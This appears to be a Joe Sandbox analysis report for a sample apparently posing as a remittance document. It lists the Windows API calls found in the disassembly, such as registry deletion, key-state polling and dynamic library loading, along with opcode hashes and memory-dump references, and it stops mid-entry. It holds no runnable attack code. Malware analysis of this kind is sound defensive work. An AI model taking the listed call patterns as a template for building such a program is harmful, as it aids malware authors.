                                                                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                      • String ID: \VH
                                                                      • API String ID: 3884216118-234962358
                                                                      • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                      • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                      • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                      • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                      • IsMenu.USER32(?), ref: 0044854D
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                      • DrawMenuBar.USER32 ref: 004485AF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                      • String ID: 0
                                                                      • API String ID: 3076010158-4108050209
                                                                      • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                      • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                      • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                      • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                      • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_memmove_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 1589278365-1403004172
                                                                      • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                                      • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                      • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                                      • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Handle
                                                                      • String ID: nul
                                                                      • API String ID: 2519475695-2873401336
                                                                      • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                      • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                      • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                      • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Handle
                                                                      • String ID: nul
                                                                      • API String ID: 2519475695-2873401336
                                                                      • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                      • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                      • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                      • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 0-1011021900
                                                                      • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                      • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                      • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                      • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                      APIs
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                      • GetFocus.USER32 ref: 0046157B
                                                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                      • __swprintf.LIBCMT ref: 00461608
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                      • String ID: %s%d
                                                                      • API String ID: 2645982514-1110647743
                                                                      • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                      • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                      • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                      • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                      • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                      • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                      • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 3488606520-0
                                                                      • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                      • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                      • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                      • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ConnectRegistry_memmove_wcslen
                                                                      • String ID:
                                                                      • API String ID: 15295421-0
                                                                      • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                      • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                      • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                      • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                      • String ID:
                                                                      • API String ID: 2449869053-0
                                                                      • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                      • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                      • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                      • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 004563A6
                                                                      • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                      • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                      • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 3539004672-0
                                                                      • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                      • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                      • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                      • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                      APIs
                                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                                      • String ID:
                                                                      • API String ID: 327565842-0
                                                                      • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                      • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                      • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                      • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                      • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                      • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                      • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 2095303065-0
                                                                      • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                      • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                      • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                      • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
